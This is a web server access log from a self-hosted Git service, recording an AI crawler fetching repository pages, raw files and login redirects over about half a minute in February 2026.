git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2fdata%2flogs%2fletsencrypt.log.4" [Client 74.7.227.38] [Length 37175] [Gzip 7.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.4" -[17/Feb/2026:15:20:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?files=npm%2fdata%2fnginx%2fproxy_host" [Client 74.7.227.38] [Length 23995] [Gzip 5.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host" -[17/Feb/2026:15:20:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2fdata%2flogs%2fletsencrypt.log.2" [Client 74.7.227.38] [Length 46124] [Gzip 9.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.2" -[17/Feb/2026:15:20:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/pip3" [Client 74.7.227.38] [Length 9938] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/pip3" -[17/Feb/2026:15:20:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/pip3" [Client 74.7.227.38] [Length 9907] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/pip3" -[17/Feb/2026:15:20:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/pip3" [Client 74.7.227.38] [Length 265] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/pip3" -[17/Feb/2026:15:20:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/pip3" [Client 74.7.227.38] [Length 10422] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/pip3" -[17/Feb/2026:15:20:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/pip3" [Client 74.7.227.38] [Length 10392] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/pip3" -[17/Feb/2026:15:20:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/pip3" [Client 74.7.227.38] [Length 265] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/pip3" -[17/Feb/2026:15:20:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2fdata%2flogs%2fletsencrypt.log.5" [Client 74.7.227.38] [Length 50404] [Gzip 8.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.5" -[17/Feb/2026:15:20:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/BRIN%20%EC%84%A4%EB%AA%85.md" [Client 74.7.227.38] [Length 13146] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook" -[17/Feb/2026:15:20:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/js/script.js?display=rendered" [Client 74.7.227.38] [Length 10959] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/js/script.js" -[17/Feb/2026:15:20:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old" [Client 74.7.227.38] [Length 10417] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm" -[17/Feb/2026:15:20:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old" [Client 74.7.227.38] [Length 10412] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm" -[17/Feb/2026:15:20:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/js/script.js?display=rendered" [Client 74.7.227.38] [Length 10955] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/js/script.js" -[17/Feb/2026:15:20:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/js/script.js?display=source" [Client 74.7.227.38] [Length 13827] [Gzip 4.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/js/script.js" -[17/Feb/2026:15:20:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/status.json?display=rendered" [Client 74.7.227.38] [Length 10896] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/status.json" -[17/Feb/2026:15:20:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/tsconfig.json?display=source" [Client 74.7.227.38] [Length 11864] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/tsconfig.json" -[17/Feb/2026:15:20:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/status.json?display=source" [Client 74.7.227.38] [Length 11071] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/status.json" -[17/Feb/2026:15:20:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/metadata.json?display=rendered" [Client 74.7.227.38] [Length 10869] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/metadata.json" -[17/Feb/2026:15:20:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/metadata.json?display=source" [Client 74.7.227.38] [Length 11278] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/metadata.json" -[17/Feb/2026:15:20:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/BRIN%20%EC%84%A4%EB%AA%85.md" [Client 74.7.227.38] [Length 15548] [Gzip 9.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/BRIN%20%EC%84%A4%EB%AA%85.md" -[17/Feb/2026:15:20:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/BRIN%20%EC%84%A4%EB%AA%85.md" [Client 74.7.227.38] [Length 3727] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/BRIN%20%EC%84%A4%EB%AA%85.md" -[17/Feb/2026:15:20:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old" [Client 74.7.227.38] [Length 9959] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old" -[17/Feb/2026:15:20:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old" [Client 74.7.227.38] [Length 9960] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old" -[17/Feb/2026:15:20:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/tsconfig.json?display=rendered" [Client 74.7.227.38] [Length 10868] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/tsconfig.json" -[17/Feb/2026:15:20:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/package.json?display=source" [Client 74.7.227.38] [Length 11680] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/package.json" -[17/Feb/2026:15:20:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/package.json?display=rendered" [Client 74.7.227.38] [Length 10873] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/package.json" -[17/Feb/2026:15:20:26 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/asset_pilot_docker/README.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker" -[17/Feb/2026:15:20:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/asset_pilot_docker/README.md" -[17/Feb/2026:15:20:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" [Client 74.7.227.38] [Length 12547] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument" -[17/Feb/2026:15:20:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/docker-compose.yml?display=source" [Client 74.7.227.38] [Length 13582] [Gzip 4.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/docker-compose.yml" -[17/Feb/2026:15:20:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/js/script.js?display=source" [Client 74.7.227.38] [Length 15595] [Gzip 5.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/js/script.js" -[17/Feb/2026:15:20:28 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/PostgresMonitor/ReadMe.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor" -[17/Feb/2026:15:20:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/PostgresMonitor/ReadMe.txt" -[17/Feb/2026:15:20:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 11754] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project" -[17/Feb/2026:15:20:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 11754] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project" -[17/Feb/2026:15:20:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/vite.config.ts?display=source" [Client 74.7.227.38] [Length 11877] [Gzip 3.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/vite.config.ts" -[17/Feb/2026:15:20:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_error.log" [Client 74.7.227.38] [Length 10160] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_error.log" -[17/Feb/2026:15:20:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/docker-compose.yml?display=source" [Client 74.7.227.38] [Length 13497] [Gzip 4.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/docker-compose.yml" -[17/Feb/2026:15:20:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/main.py?display=rendered" [Client 74.7.227.38] [Length 10912] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/main.py" -[17/Feb/2026:15:20:32 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/html/README.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html" -[17/Feb/2026:15:20:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/html/README.md" -[17/Feb/2026:15:20:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" [Client 74.7.227.38] [Length 2167] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" -[17/Feb/2026:15:20:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build" [Client 74.7.227.38] [Length 11115] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject" -[17/Feb/2026:15:20:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build" [Client 74.7.227.38] [Length 11106] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject" -[17/Feb/2026:15:20:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build" [Client 74.7.227.38] [Length 11106] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject" -[17/Feb/2026:15:20:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/controller-next-todo.md" -[17/Feb/2026:15:20:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/controller-next-todo.md" -[17/Feb/2026:15:20:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 12894] [Gzip 6.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/controller-next-todo.md" -[17/Feb/2026:15:20:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 12894] [Gzip 6.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/controller-next-todo.md" -[17/Feb/2026:15:20:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 1924] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/controller-next-todo.md" -[17/Feb/2026:15:20:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 1924] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/controller-next-todo.md" -[17/Feb/2026:15:20:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/status.json" [Client 74.7.227.38] [Length 9876] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/status.json" -[17/Feb/2026:15:20:38 